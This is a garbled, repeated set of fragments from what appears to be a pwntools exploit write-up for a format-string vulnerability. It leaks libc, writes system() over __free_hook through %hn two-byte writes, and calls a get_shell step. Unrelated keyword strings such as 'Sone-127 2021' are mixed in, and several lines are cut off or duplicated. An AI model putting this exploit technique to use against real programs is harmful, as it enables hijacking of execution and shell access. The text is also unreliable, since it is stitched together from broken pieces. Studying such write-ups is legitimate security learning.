Sone-127 2021 May 2026

# 1️⃣ Leak libc libc_base = leak_libc(io)

io.sendlineafter(b'> ', b'echo ' + payload) io.recvuntil(b'> ') # sync back to prompt SONE-127 2021

%addr_lowc%8$hn%addr_highc%9$hn Because the target address ( __free_hook ) is 8‑byte aligned, we split it into two 2‑byte halves and write with %hn (write 2 bytes). # 1️⃣ Leak libc libc_base = leak_libc(io) io

# 3️⃣ Get a shell get_shell(io)

> echo AAAA%low%8$hn%high%9$hnBBBBaddr_lowaddr_high Where addr_low and addr_high are the low/high 2‑byte parts of __free_hook placed in the payload after the format string (so that they appear on the stack as the 8th and 9th arguments). b'echo ' + payload) io.recvuntil(b'&gt

def write_free_hook(io, libc_base): system_addr = libc_base + libc.sym['system'] free_hook = libc_base + libc.sym['__free_hook'] log.info(f'system: hex(system_addr)') log.info(f'__free_hook: hex(free_hook)')